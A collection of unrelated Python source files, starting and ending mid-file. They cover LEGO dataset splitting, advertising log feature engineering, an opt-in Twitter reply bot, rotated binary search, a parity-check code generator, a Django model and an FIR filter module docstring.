#breakout_paths.extend(file_paths)
for file_path in file_paths:
scene.clear_instances()
scene.clear_assets()
scene.import_ldraw(os.path.join(omr_ldraw, file_path))
instances_per_scene.append(len(scene.instances))
set_signature = {}
for instance_id, instance in scene.instances.items():
brick_shape = instance.brick_shape
if str(brick_shape) not in instance_counts:
instance_counts[str(brick_shape)] = 0
instance_counts[str(brick_shape)] += 1
all_colors.add(instance.color)
if str(brick_shape) not in set_signature:
set_signature[brick_shape] = 0
set_signature[brick_shape] += 1
set_signature = ','.join('%s:%i'%(key, value)
for key, value in set_signature.items())
if set_signature not in set_signatures:
breakout_paths.append(file_path)
set_signatures[set_signature] = []
set_signatures[set_signature].append(file_path)
edges = scene.get_all_edges(unidirectional=True)
edges_per_scene.append(edges.shape[1])
print('%s:'%file_path)
print(' %i instances'%len(scene.instances))
print(' %i edges'%(edges.shape[1]))
print('%i broken-out sets found'%len(breakout_paths))
print('%i unique sets found'%len(set_signatures))
for set_signature, file_paths in set_signatures.items():
if len(file_paths) > 1:
print('Warning possible duplicated sets:')
for file_path in file_paths:
print(' ', file_path)
print('Average instances per model: %f'%(
sum(instances_per_scene)/len(instances_per_scene)))
print('Min/Max instances per model: %i, %i'%(
min(instances_per_scene), max(instances_per_scene)))
print('Average edges per model: %f'%(
sum(edges_per_scene)/len(edges_per_scene)))
print('Min/Max edges per model: %i, %i'%(
min(edges_per_scene), max(edges_per_scene)))
sorted_instance_counts = reversed(sorted(
(value, key) for key, value in instance_counts.items()))
print('Part usage statistics:')
for count, brick_shape in sorted_instance_counts:
print('%s: %i'%(brick_shape, count))
print('%i total brick shapes'%len(instance_counts))
random.seed(1234)
breakout_paths = list(sorted(breakout_paths))
test_set = sorted(random.sample(breakout_paths, 20))
train_set = [path for path in breakout_paths if path not in test_set]
all_tiny_turbos = ['ldraw/' + set_name for set_name in breakout_paths]
train_tiny_turbos = ['ldraw/' + set_name for set_name in train_set]
test_tiny_turbos = ['ldraw/' + set_name for set_name in test_set]
dataset_info = {
'splits' : {
'all' : all_tiny_turbos,
'train' : train_tiny_turbos,
'test' : test_tiny_turbos
},
'max_instances_per_scene' : max(instances_per_scene),
'max_edges_per_scene' : max(edges_per_scene),
'shape_ids':dict(
zip(sorted(instance_counts.keys()),
range(1, len(instance_counts)+1))),
'all_colors':list(sorted(all_colors, key=int))
}
with open(tiny_turbos3_path, 'w') as f:
json.dump(dataset_info, f, indent=4)
|
from os import listdir
from os import path
from flyingpigeon import sdm
p = '/home/nils/birdhouse/var/lib/pywps/cache/malleefowl/esgf1.dkrz.de/thredds/fileServer/cordex/cordex/output/AFR-44/MPI-CSC/MPI-M-MPI-ESM-LR/historical/r1i1p1/MPI-CSC-REMO2009/v1/day/tas/v20160412/'
ncs = [path.join(p, nc) for nc in listdir(p)]
ncs.sort()
indices = sdm._SDMINDICES_
in_nc = sdm.get_indices(ncs, indices=['TG_AMJJAS'])
print fp_indice
|
import numpy as np
# ai格式范例
# 需要决定吃碰杠/立直/和的时候被调用
def action(info, action_type):
if (action_type in ['pon', 'chii', 'kan']):
return False # 取消
if (action_type in ['ron', 'tsumo']):
return True # 确认
return None # 什么都不做
# 需要出牌时被调用
def discard(info):
return len(info.hand) - 1 # 打最后一张牌
|
# Даны целые числа , указывающие момент времени.
# Определить угол между положением часовой стрелки в начале суток и в указанный момент времени.
(lambda hour, minute, second:
print(abs(hour * 30 + minute * 0.5 + second * 0.5/60))) \
(float(input()), float(input()), float(input()))
|
# -*- coding: utf-8 -*-
"""
@file:maketrain.py
@time:2019/5/6 16:42
@author:Tangj
@software:Pycharm
@Desc
"""
import pandas as pd
import numpy as np
import gc
import time
name = ['log_0_1999', 'log_2000_3999', 'log_4000_5999','log_6000_7999', 'log_8000_9999', 'log_10000_19999',
'log_20000_29999', 'log_30000_39999','log_40000_49999',
'log_50000_59999','log_60000_69999','log_70000_79999','log_80000_89999','log_90000_99999',
'log_100000_109999','log_110000_119999','log_120000_129999','log_130000_139999']
def group_split(list_values):
new_values = []
for values in list_values:
vals = values.split(',')
for i in vals:
if i not in new_values:
new_values.append(i)
new_values.sort()
if 'all' in new_values:
return 'all'
str_val = new_values[0]
flag = 1
for i in new_values:
if flag == 1:
str_val = str(i)
flag = 0
else:
str_val = str_val + ',' + str(i)
return str_val
def putting_time_process(put_time):
bi_val = [0] * 48
for time in put_time:
time = int(time)
bi_time = bin(time)
j = 0
num = len(bi_time) - 1
while num > 1:
bi_val[j] += int(bi_time[num])
num -= 1
j += 1
n = 47
flag = 1
times = '0'
total = 0
while n >= 0:
if bi_val[n] >= 1:
val = 1
total += 1
else:
val = 0
if flag == 1:
flag = 0
times = str(val)
else:
times = times + str(val)
n -= 1
re_times1 = int(times, 2)
return re_times1, times, total
def disstatus(train, option):
print("status processing")
distime = []
opstatus = option[option['changeField'] == 1]
opstatus.index = opstatus['statime']
opstatus.sort_index()
opstatus.index = range(opstatus.shape[0])
values = opstatus['changeValue']
optime = opstatus['statime'].values
flag = 1
j = 0
for i in values:
if (i == '0') & (flag == 1):
distime.append(optime[j])
flag = 0
if (i == '1') & (flag == 0):
distime.append(optime[j])
flag = 1
j += 1
j = 0
if len(distime) == 0:
return train
elif (len(distime) % 2 == 0):
for i in range(int(len(distime) / 2)):
Train = pd.DataFrame()
t1 = distime[j]
t2 = distime[j + 1]
# print(t1)
# print(t2)
j += 2
train1 = train[train['statime'] < t1]
# print(train1['Reqday'].unique())
Train = pd.concat([Train, train1])
train1 = train[train['statime'] > t2]
# print(train1['Reqday'].unique())
Train = pd.concat([Train, train1])
train = Train
else:
t1 = distime[-1]
train = train[train['statime'] < t1]
Train = pd.DataFrame()
for i in range(int(len(distime) / 2)):
Train = pd.DataFrame()
t1 = distime[j]
t2 = distime[j + 1]
j += 2
train1 = train[train['statime'] < t1]
Train = pd.concat([Train, train1])
train2 = train[train['statime'] > t2]
Train = pd.concat([Train, train2])
train = Train
# print(train.shape)
del Train
gc.collect()
return train
def initValue(train, operate):
print("initing processing")
ope = operate[operate['optionType'] == 2]
# 初始化bid
print("initing bid")
inb = ope[ope['changeField'] == 2]['changeValue']
if inb.shape[0] == 0:
train.loc[:, 'adBid'] = 88
else:
inbid = '-1'
for i in inb:
inbid = i
break
train.loc[:, 'adBid'] = int(inbid)
# 初始化人群
print("initing peo")
train.loc[:, 'age'] = 'all'
train.loc[:, 'gender'] = 'all'
train.loc[:, 'area'] = 'all'
train.loc[:, 'status'] = 'all'
train.loc[:, 'education'] = 'all'
train.loc[:, 'consuptionAbility'] = 'all'
train.loc[:, 'device'] = 'all'
train.loc[:, 'work'] = 'all'
train.loc[:, 'connectionType'] = 'all'
train.loc[:, 'behavior'] = 'all'
if ope[ope['changeField'] == 3].shape[0] != 0:
inpeo = ope[ope['changeField'] == 3]['changeValue'].values[0]
peofea = inpeo.split("|")
for fea in peofea:
l = fea.split(':')
if (len(l) < 2):
continue
feas = l[1].split(',')
feas.sort()
if (feas is None):
continue
flags = 1
feature = '0'
for i in feas:
if (flags == 1):
feature = str(i)
flags = 0
continue
feature = feature + ',' + str(i)
# feature = str(feas)
if l[0].lower() == 'age':
if (len(feas) < 100):
# print(feature)
train.loc[:, 'age'] = feature
if l[0].lower() == 'gender':
# print(feature)
train.loc[:, 'gender'] = feature
if l[0].lower() == 'area':
# print(feature)
train.loc[:, 'area'] = feature
if l[0].lower() == 'status':
# print(feature)
train.loc[:, 'status'] = feature
if l[0].lower() == 'education':
# print(feature)
train.loc[:, 'education'] = feature
if l[0].lower() == 'consuptionability':
# print(feature)
train.loc[:, 'consuptionAbility'] = feature
if l[0].lower() == 'os':
# print(feature)
train.loc[:, 'device'] = feature
if l[0].lower() == 'work':
# print(feature)
train.loc[:, 'work'] = feature
if l[0].lower() == 'connectiontype':
# print(feature)
train.loc[:, 'connectionType'] = feature
if l[0].lower() == 'behavior':
# print(feature)
train.loc[:, 'behavior'] = feature
# 初始化投放时间
inti = ope[ope['changeField'] == 4]['changeValue'].values[0]
putting = inti.split(',')
len_inti = ope[ope['changeField'] == 4].shape[0]
# print(putting)
if (len(putting) != 7) or (len_inti == 0):
train.loc['puttingTime'] = '281474976710655'
else:
train.loc[train['week'] == 0, 'puttingTime'] = putting[0]
train.loc[train['week'] == 1, 'puttingTime'] = putting[1]
train.loc[train['week'] == 2, 'puttingTime'] = putting[2]
train.loc[train['week'] == 3, 'puttingTime'] = putting[3]
train.loc[train['week'] == 4, 'puttingTime'] = putting[4]
train.loc[train['week'] == 5, 'puttingTime'] = putting[5]
train.loc[train['week'] == 6, 'puttingTime'] = putting[6]
return train
def changeBid(train, operate):
print("changebid processing")
option = operate[operate['optionType'] == 1]
opbid = option[option['changeField'] == 2]
if opbid.shape[0] == 0:
return train
opbid.index = opbid['statime']
opbid.sort_index()
opbid.index = range(opbid.shape[0])
values = opbid['changeValue']
optime = opbid['statime'].values
j = 0
for ti in optime:
Train = pd.DataFrame()
train1 = train[train['statime'] <= ti]
# print(ti)
# print(train1['Reqday'].unique())
Train = pd.concat([Train, train1])
train2 = train[train['statime'] > ti]
# print(train2['Reqday'].unique())
train2.loc[:, 'adBid'] = int(values[j])
# print(train2.shape)
Train = pd.concat([Train, train2])
train = Train
j += 1
del Train
gc.collect()
print(train.shape)
return train
def changePeo(train, operate):
option = operate[operate['optionType'] == 1]
opbid = option[option['changeField'] == 3]
if opbid.shape[0] == 0:
return train
print("changepeo processing")
opbid.index = opbid['statime']
opbid.sort_index()
opbid.index = range(opbid.shape[0])
values = opbid['changeValue']
optime = opbid['statime'].values
j = 0
x = 1
for ti in optime:
Train = pd.DataFrame()
train1 = train[train['statime'] <= ti]
# print(ti)
# print(train1['Reqday'].unique())
Train = pd.concat([Train, train1])
train2 = train[train['statime'] > ti]
# print(train2['Reqday'].unique())
# 人群重定向之前,需要重新给出初始化操作
train2.loc[:, 'age'] = 'all'
train2.loc[:, 'gender'] = 'all'
train2.loc[:, 'area'] = 'all'
train2.loc[:, 'status'] = 'all'
train2.loc[:, 'education'] = 'all'
train2.loc[:, 'consuptionAbility'] = 'all'
train2.loc[:, 'device'] = 'all'
train2.loc[:, 'work'] = 'all'
train2.loc[:, 'connectionType'] = 'all'
train2.loc[:, 'behavior'] = 'all'
# print(values[j])
inp = values[j]
for i in inp:
inpeo = str(i)
break
peofea = inpeo.split("|")
for fea in peofea:
l = fea.split(':')
if (len(l) < 2):
continue
feas = l[1].split(',')
feas.sort()
if (feas is None):
continue
# feature = str(feas)
flags = 1
feature = '0'
for i in feas:
if (flags == 1):
feature = str(i)
flags = 0
continue
feature = feature + ',' + str(i)
if l[0].lower() == 'age':
if (len(feas) < 100):
train2.loc[:, 'age'] = feature
if l[0].lower() == 'gender':
train2.loc[:, 'gender'] = feature
if l[0].lower() == 'area':
train2.loc[:, 'area'] = feature
if l[0].lower() == 'status':
train2.loc[:, 'status'] = feature
if l[0].lower() == 'education':
train2.loc[:, 'education'] = feature
if l[0].lower() == 'consuptionability':
train2.loc[:, 'consuptionAbility'] = feature
if l[0].lower() == 'os':
train2.loc[:, 'device'] = feature
if l[0].lower() == 'work':
train2.loc[:, 'work'] = feature
if l[0].lower() == 'Connectiontype':
train2.loc[:, 'connectionType'] = feature
if l[0].lower() == 'behavior':
train2.loc[:, 'behavior'] = feature
Train = pd.concat([Train, train2])
train = Train
j += 1
del Train
gc.collect()
print(train.shape)
return train
def changeTime(train, operate):
print("changeTime processing")
option = operate[operate['optionType'] == 1]
opbid = option[option['changeField'] == 4]
if opbid.shape[0] == 0:
return train
opbid.index = opbid['statime']
opbid.sort_index()
opbid.index = range(opbid.shape[0])
values = opbid['changeValue'].values
optime = opbid['statime'].values
if len(values) == 0:
return train
j = 0
for ti in optime:
Train = pd.DataFrame()
train1 = train[train['statime'] <= ti]
Train = pd.concat([Train, train1])
train2 = train[train['statime'] > ti]
putting = values[j].split(',')
if (len(putting) == 7):
train2.loc[train2['week'] == 0, 'puttingTime'] = putting[0]
train2.loc[train2['week'] == 1, 'puttingTime'] = putting[1]
train2.loc[train2['week'] == 2, 'puttingTime'] = putting[2]
train2.loc[train2['week'] == 3, 'puttingTime'] = putting[3]
train2.loc[train2['week'] == 4, 'puttingTime'] = putting[4]
train2.loc[train2['week'] == 5, 'puttingTime'] = putting[5]
train2.loc[train2['week'] == 6, 'puttingTime'] = putting[6]
Train = pd.concat([Train, train2])
train = Train
j += 1
del Train
gc.collect()
print(train.shape)
return train
option = pd.read_csv('../data/adoption_use3.csv')
x = []
for i in option['statime'].values:
m = i.split('_')
if len(m) == 4:
mon = m[0].zfill(2)
day = m[1].zfill(2)
h = m[2].zfill(2)
mii = m[3].zfill(2)
x.append(mon + day + h + mii)
else:
x.append('0')
option['statime'] = x
adstatic = pd.read_csv('../data/ad_static_feature.csv')
option.fillna('-1')
adstatic.fillna('-1')
mask = ~((option['changeTime'] == 0) & (option['optionType'] != 2))
adoption = option[mask]
TotalTrain = pd.DataFrame()
for na in name:
column_name = ['Reqday', 'ad_id', 'ad_count_id', 'goods_id', 'goods_type', 'create_time',
'ad_industry_id', 'ad_size', 'adBid', 'age', 'gender',
'education', 'consuptionAbility', 'device', 'connectionType', 'work', 'area',
'status', 'behavior', 'puttingTime ', 'Reqday', 'exposure', 'user_id']
totalTrain = pd.DataFrame()
logdata = pd.read_csv('../data/logdel/' + str(na) + '.csv')
userdata = pd.read_csv('../data/user/user_' + str(na) + '.csv')
createdata = pd.read_csv('../data/havecreate.csv')
creAid = createdata['have'].unique()
# 先将日期和小时信息打进去
# 将每次的option时间以“|”拼起来存储,作为不同广告的区分,也作为之后明确生效时间段划分数据
day = []
hour = []
optiontime = []
day_hour = []
weekday = []
for i in logdata['adRequestTime']:
tt = time.localtime(i)
mons = str(tt.tm_mon).zfill(2)
days = str(tt.tm_mday).zfill(2)
hou = str(tt.tm_hour).zfill(2)
mmi = str(tt.tm_min).zfill(2)
day.append(str(mons + '_' + days))
hour.append(str(hou + '_' + mmi))
d_h = str(mons + days + hou + mmi)
day_hour.append(str(d_h))
weekday.append(tt.tm_wday)
logdata['Reqday'] = day
logdata['week'] = weekday
logdata['Reqhourmin'] = hour
logdata['statime'] = day_hour
# 对每一个ad的train进行遍历,构造训练集
ad = logdata['ad_id'].unique()
for aid in ad:
if aid not in creAid:
continue
aidlog = logdata[logdata['ad_id'] == aid]
aidlog = pd.merge(aidlog, adstatic, on='ad_id', how='left')
aidlog = pd.merge(aidlog, userdata, on='user_id', how='left')
aidlog = aidlog.fillna('-1')
train = aidlog.copy()
option1 = adoption[adoption['ad_id'] == aid]
ad_create_time = aidlog['create_time'].unique()[0]
tt = time.localtime(ad_create_time)
mons = str(tt.tm_mon).zfill(2)
days = str(tt.tm_mday).zfill(2)
hou = str(tt.tm_hour).zfill(2)
mmi = str(tt.tm_min).zfill(2)
cre_time = str(mons + days + hou + mmi)
# print(cre_time)
op1 = option1[option1['statime'] >= cre_time]
op2 = option1[option1['optionType'] == 2]
option = pd.concat([op1, op2])
train = disstatus(train, option)
if (train.shape[0] == 0):
continue
train = initValue(train, option)
train = changeBid(train, option)
train = changePeo(train, option)
train = changeTime(train, option)
grouped = train.groupby(['Reqday', 'ad_id', 'adBid', 'puttingTime'])
for i in grouped:
log = i[1][0:1]
log_all = i[1]
train_i = pd.DataFrame()
train_i['Reqday'] = [i[0][0]]
train_i['ad_id'] = [i[0][1]]
train_i['exposure'] = i[1].shape[0]
# 对于广告的动态特征,这里就先对其进行一个group,放在同一个list里面
train_i['adBid'] = np.mean(log_all['adBid'].values) # 取均值
time_int, time_two, time_total = putting_time_process(log_all['puttingTime'].unique())
train_i['puttingTime_int'] = time_int
train_i['puttingTime_two'] = time_two # 这是转换为二进制的48位的01串,直接作为48个编码的特征使用
train_i['puttingTime_total'] = time_total # 这是总的投放时长,直接作为一个数值特征使用
train_i['age'] = group_split(log_all['age'].values) # 直接取一个list,原始的取出来是一个字符串,先在重新对其取并再生成新的字符串
train_i['gender'] = group_split(log_all['gender'].values)
train_i['area'] = group_split(log_all['area'].values)
train_i['status'] = group_split(log_all['status'].values)
train_i['education'] = group_split(log_all['education'].values)
train_i['consuptionAbility'] = group_split(log_all['consuptionAbility'].values)
train_i['device'] = group_split(log_all['device'].values)
train_i['work'] = group_split(log_all['work'].values)
train_i['connectionType'] = group_split(log_all['connectionType'].values)
train_i['behavior'] = group_split(log_all['behavior'].values)
# 广告静态特征,可以直接赋值,认为是在日志里面是不变化的
train_i['ad_count_id'] = log['ad_count_id'].values[0]
train_i['goods_id'] = log['goods_id'].values[0]
train_i['goods_type'] = log['goods_type'].values[0]
train_i['create_time'] = log['create_time'].values[0]
train_i['ad_industry_id'] = log['ad_industry_id'].values[0]
train_i['ad_size'] = log['adSize'].values[0]
train_i['user_id'] = str(i[1]['user_id'].unique())
train_i['adPosition_id'] = str(i[1]['adPosition_id'].unique())
train_i['adPctr'] = np.mean(log['adPctr'].values)
train_i['adQuality_ecpm'] = np.mean(log['adQuality_ecpm'].values)
train_i['totalEcpm'] = np.mean(log['totalEcpm'].values)
totalTrain = pd.concat([totalTrain, train_i])
TotalTrain = pd.concat([TotalTrain, totalTrain])
del totalTrain
gc.collect()
TotalTrain.to_csv('TotalTrain_cpc.csv', index=False)
|
import tweepy
import json
import os.path
"""
read in auth data
"""
auth_data = None
with open('auth.json') as f:
auth_data = json.load(f)
f.close()
handle = auth_data['twitter_handle']
cons_key = auth_data['consumer_key']
cons_sec = auth_data['consumer_secret']
acc_tok = auth_data['access_token']
acc_tok_sec = auth_data['access_token_secret']
MSG_OPT_IN = 'opt-in'
MSG_OPT_OUT = 'opt-out'
MSG_AT = '@{}'.format(handle)
MSG_REPLY = 'Here\'s your custom message!'
"""
get opt-in from user
& opt-out
"""
FILE_USERS = 'users.json'
users = {}
# read in existing users
def readUsersFromFile() -> {}:
users = {}
if os.path.isfile(FILE_USERS):
with open(FILE_USERS, 'r') as f:
users = json.load(f)
f.close()
return users
def saveUsersToFile() -> None:
with open(FILE_USERS, 'w') as f:
json.dump(users, f)
f.close()
def addUser(userId: str) -> None:
users[userId] = 0
saveUsersToFile()
def removeUser(userId: str) -> None:
if userId in users:
users.pop(userId)
saveUsersToFile()
def incUserSent(userId: str) -> None:
if userId in users:
users[userId] += 1
saveUsersToFile()
"""
tweepy stuff
"""
auth = tweepy.OAuthHandler(cons_key, cons_sec)
auth.set_access_token(acc_tok, acc_tok_sec)
api = tweepy.API(auth)
user = api.me()
print('Bot running on {}'.format(user.name))
class StreamBoth(tweepy.StreamListener):
def __init__(self):
super().__init__()
self.restart = False
def on_connect(self):
print('Streaming started with users {}'.format(list(users.keys())))
def on_status(self, status):
# for user opting in/out
if MSG_AT in status.text:
print('{} tweeted you!'.format(status.user.screen_name))
if MSG_OPT_IN in status.text:
print('{} opted in!'.format(status.user.screen_name))
addUser(status.user.id_str)
self.restart = True
elif MSG_OPT_OUT in status.text:
print('{} opted out!'.format(status.user.screen_name))
removeUser(status.user.id_str)
self.restart = True
# for tracked user tweeting
elif status.user.id_str in list(users.keys()):
print('Tweeted @{}'.format(status.user.screen_name))
api.update_status('@{} {} #{}'.format(status.user.screen_name, MSG_REPLY, users[status.user.id_str]), status.id_str)
incUserSent(status.user.id_str)
"""
let's do stuff
"""
users = readUsersFromFile()
if not users:
print('No users in users.json!')
streamList = StreamBoth()
stream = tweepy.Stream(auth = api.auth, listener=streamList)
stream.filter(track=MSG_AT, follow=users, is_async=True)
while True:
if streamList.restart:
print('User opted in/out; restarting...')
stream.disconnect()
# restart with new set of users
streamList = StreamBoth()
stream = tweepy.Stream(auth = api.auth, listener=streamList)
stream.filter(track=MSG_AT, follow=users, is_async=True)
|
from datetime import time
# TODO make them constant
# URL
# TODO format
BOATRACEJP_MAIN_URL = 'https://www.boatrace.jp/'
BOATRACEJP_LOGIN_URL = f'{BOATRACEJP_MAIN_URL}owpc/pc/login?authAfterUrl=/'
BOATRACEJP_LOGOUT_URL = f'{BOATRACEJP_MAIN_URL}owpc/logout'
BOATRACEJP_BASE_URL = f"{BOATRACEJP_MAIN_URL}owpc/pc/race"
IBMBRACEORJP = ''.join([
f'{BOATRACEJP_MAIN_URL}',
'owpc/VoteBridgeNew.jsp?',
'param=H0JS00000stContens'
'&kbn=1'
'&voteActionUrl=/owpc/pc/site/index.html'
])
# TIME
BOATRACE_START = time(hour=8, minute=30) # 8:30
BOATRACE_END = time(hour=20, minute=45) # 20:45
# RACE
# # races
NUM_RACES = 12 # # of races in a stadium on a day
# # boats
NUM_BOATS = 6
BOATS_GEN = range(1, NUM_BOATS+1)
# # stadiums
STADIUMS_MAP = tuple((i+1, stadium) for i, stadium in enumerate([
"桐生",
"戸田",
"江戸川",
"平和島",
"多摩川",
"浜名湖",
"蒲郡",
"常滑",
"津",
"三国",
"びわこ",
"住之江",
"尼崎",
"鳴門",
"丸亀",
"児島",
"宮島",
"徳山",
"下関",
"若松",
"芦屋",
"福岡",
"唐津",
"大村",
]))
NUM_STADIUMS = len(STADIUMS_MAP)
|
def binary_search(arr: list, left: int, right: int, key: int) -> int:
"""Iterative Binary Search"""
if left > right:
return -1
while left <= right:
mid = left + (right - left) // 2
if arr[mid] == key:
return mid
elif arr[mid] < key:
left = mid + 1
else:
right = mid - 1
return -1
def find_pivot(arr: list, left, right) -> int:
while left <= right:
mid = left + (right - left) // 2
if arr[mid] > arr[mid + 1]:
return mid + 1
elif arr[left] >= arr[mid]:
right = mid
else:
left = mid + 1
return -1
def rotated_binary_search(arr: list, key: int) -> int:
left = 0
right = len(arr) - 1
pivot = find_pivot(arr, left, right)
if pivot == -1:
# Not rotated
return binary_search(arr, left, right, key)
if arr[pivot] == key:
return pivot
elif arr[0] <= key:
return binary_search(arr, 0, pivot - 1, key)
return binary_search(arr, pivot + 1, right, key)
def rotated_binary_search_1_pass(arr: list, key: int) -> int:
left = 0
right = len(arr) - 1
while left <= right:
mid = left + (right - left) // 2
if arr[mid] == key:
return mid
elif arr[left] <= arr[mid]:
if key >= arr[left] and key <= arr[mid]:
right = mid - 1
else:
left = mid + 1
else:
if key >= arr[mid] and key <= arr[right]:
left = mid + 1
else:
right = mid - 1
return -1
if __name__ == "__main__":
ARR = [5, 6, 7, 8, 9, 10, 1, 2, 3]
print(f"Search 7 in {ARR}: {rotated_binary_search_1_pass(ARR, 7)}")
print(f"Search 3 in {ARR}: {rotated_binary_search_1_pass(ARR, 3)}")
print(f"Search 9 in {ARR}: {rotated_binary_search_1_pass(ARR, 9)}")
print(f"Search 1 in {ARR}: {rotated_binary_search_1_pass(ARR, 1)}")
print(f"Search 0 in {ARR}: {rotated_binary_search_1_pass(ARR, 0)}")
|
#Steer Left - Left LS
#Steer Right - Right LS
from vjoy import vJoy, ultimate_release
import time
vj = vJoy()
XYRANGE = 16393
ZRANGE = 32786
vj.open()
# print('gass')
# time.sleep(2)
# joystickPosition = vj.generateJoystickPosition(wAxisZ = ZRANGE) # pilna gaaze
# vj.update(joystickPosition)
# time.sleep(2)
# joystickPosition = vj.generateJoystickPosition(wAxisZ = 0) # izslegta gaaze
# vj.update(joystickPosition)
# print("bremz")
# time.sleep(2)
# joystickPosition = vj.generateJoystickPosition(wAxisZRot = ZRANGE) # pilna bremze
# vj.update(joystickPosition)
# time.sleep(1)
# joystickPosition = vj.generateJoystickPosition(wAxisZRot = 0) # izslegta bremze
# vj.update(joystickPosition)
print("pa kreisi")
time.sleep(2)
joystickPosition = vj.generateJoystickPosition(wAxisX = 0) # FULLL LABI
vj.update(joystickPosition)
time.sleep(1)
print("pa labi")
time.sleep(2)
joystickPosition = vj.generateJoystickPosition(wAxisX = ZRANGE)
vj.update(joystickPosition)
time.sleep(2)
# vj.open()
# lol = 0
# while True:
# lol += 1
# joystickPosition = vj.generateJoystickPosition(wAxisX = lol)
# vj.update(joystickPosition)
# if (lol > 32000):
# lol = 0
joystickPosition = vj.generateJoystickPosition()
vj.update(joystickPosition)
time.sleep(0.001)
vj.close()
|
"""Extends crowddynamics commandline client with gui related commands"""
import logging
import sys
import click
from PyQt4 import QtGui, QtCore
from crowddynamics.logging import setup_logging
from qtgui.main import MainWindow
def run_gui(simulation_cfg=None):
r"""Launches the graphical user interface for visualizing simulation."""
setup_logging()
logger = logging.getLogger(__name__)
logger.info('Starting GUI')
app = QtGui.QApplication(sys.argv)
win = MainWindow()
if simulation_cfg:
win.set_simulations(simulation_cfg)
win.show()
# Start Qt event loop unless running in interactive mode or using pyside.
if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):
app.exec()
else:
logger.warning("Interactive mode and pyside are not supported.")
logging.info('Exiting GUI')
logging.shutdown()
win.close()
app.exit()
sys.exit()
@click.group()
def main():
pass
@main.command()
@click.option('--simulation_file', type=str, default=None)
def run(simulation_file):
"""Launch gui for crowddynamics"""
run_gui(simulation_file)
if __name__ == "__main__":
main()
|
import bokeh.sampledata
bokeh.sampledata.download()
|
import numpy as np
def vecNum(vec):
return int("".join(str(int(n)) for n in vec), base=2)
def printBinary(mat, width):
for vec in mat:
print("0b{:0{}b},".format(vecNum(vec), width))
def genToParityCheck(genParity):
xpose = genParity.transpose()
return np.hstack((xpose, np.eye(xpose.shape[0])))
gen = np.array([
[1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 1, 1, 1, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 1, 1, 1, 0],
[0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 1, 1, 1],
[0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 1, 0, 1, 1, 0, 1, 1],
[0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 0, 1, 0, 0, 1, 1, 1, 0, 0, 1, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 1, 1, 1, 0, 0, 1, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 1, 1, 1, 0, 0, 1],
])
parity = gen[:, -8:]
print("generator:")
printBinary(parity.transpose(), 9)
print("parity check:")
parityCheck = genToParityCheck(parity)
printBinary(parityCheck, 17)
error = [1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
syndromes = {}
for r in range(17):
w = np.roll(error, r)
w[-1] = 1
s = (parityCheck @ w) % 2
syndromes[vecNum(s)] = vecNum(w)
for x in syndromes.keys():
assert x < 256
print("syndrome/pattern mappings:")
for syn in range(256):
try:
print("\n0b{:017b},".format(syndromes[syn]))
except KeyError:
print("0, ", end="")
print()
|
# -*- coding: utf-8 -*-
from django.db import models
from datetime import datetime
class Feedback(models.Model):
name = models.CharField('Name', max_length=50, default="Anonym", blank=True)
email = models.EmailField('E-Mail', max_length=254, blank=True)
note = models.TextField('Anmerkung', max_length=1024, blank=False)
answer = models.TextField('Antwort', max_length=1024, blank=True)
author = models.CharField('Antwort von', max_length=50, default="Admin", blank=True)
archive = models.BooleanField('Bearbeitet?', default=False)
public = models.BooleanField('Öffentlich?', default=True)
created = models.DateTimeField('Erstellt am', default=datetime.now)
|
""" **Description**
A Finite Impulse Response ( FIR ) filter realizes a discrete difference
equation as a function of a forward coefficient array and a state array
of a specified order, consuming an incident signal and producing a
reference signal.
.. math::
y_{n} = \sum_{i = 0}^{N} b_{i,n} x_{n-i} = \sum_{i = 1}^{N} b_{i,n} s_{i,n} + b_{0,n} x_{n}
.. math::
s_{1,n+1} = x_{n}\qquad\quad s_{i,n+1} = s_{i-1,n}
A reset may minimize edge effects at a discontinuity by assuming
persistent operation at a specified incident signal condition.
.. math::
s_{i,n} = x_{n}
A frequency response is expressed as a function of a forward
coefficient array.
.. math::
H_{z,n} = \sum_{i = 0}^{N} b_{i,n} z^{-i}
A forward coefficient array and state array of a specified order are
defined to realize specified constraints. A style, frequency,
order, count, complement, and gain are electively specified.
Alternatively, a forward coefficient array and state array may be explicitly
defined to ignore constraints.
Frequency corresponds to a -3 dB frequency response normalized relative
to Nyquist.
Style is in ( 'Blackman', 'Hamming', 'Hann', 'Kaiser' ).
* | 'Blackman' filters demonstrate low resolution and spectral leakage
| with improved rate of attenuation.
* | 'Hamming' filters demonstrate minimal nearest side lobe magnitude
| response.
* | 'Hann' filters demonstrate high resolution and spectral leakage.
* | 'Kaiser' filters demonstrate flexible resolution and spectral
| leakage dependent upon a beta value of a Bessel function of the
| first kind, with beta equal to 7.0.
Order must even to ensure a Type I form linear phase solution.
Count is a quantity of filters of a specified order concatenated to
form an aggregate frequency response in cascade form.
Complement effectively constructs a mirror image of a specified
frequency response.
**Example**
::
from diamondback import FirFilter
import numpy
# Create an instance with constraints.
obj = FirFilter( style = 'Kaiser', frequency = 0.1, order = 32, count = 1 )
# Create an instance with coefficients.
obj = FirFilter( b = obj.b )
# Estimate frequency response, group delay, and roots.
y, f = obj.response( length = 8192, count = 1 )
y, f = obj.delay( length = 8192, count = 1 )
p, z = obj.roots( count = 1 )
# Filter an incident signal.
x = numpy.random.rand( 128 ) * 2.0 - 1.0
obj.reset( x[ 0 ] )
y = obj.filter( x )
**License**
`BSD-3C. <https://github.com/larryturner/diamondback/blob/master/license>`_
© 2018 - 2021 Larry Turner, Schneider Electric Industries SAS. All rights reserved.
**Author**
Larry Turner, Schneider Electric, Analytics & AI, 2018-01-23.
"""
from diamondback.interfaces.IB import IB
from diamondback.interfaces.IReset import IReset
from diamondback.interfaces.IS import IS
from typing import List, Tuple, Union
import math
import numpy
import scipy.signal
import warnings
class FirFilter( IB, IReset, IS ) :
""" Finite Impulse Response ( FIR ) filter.
"""
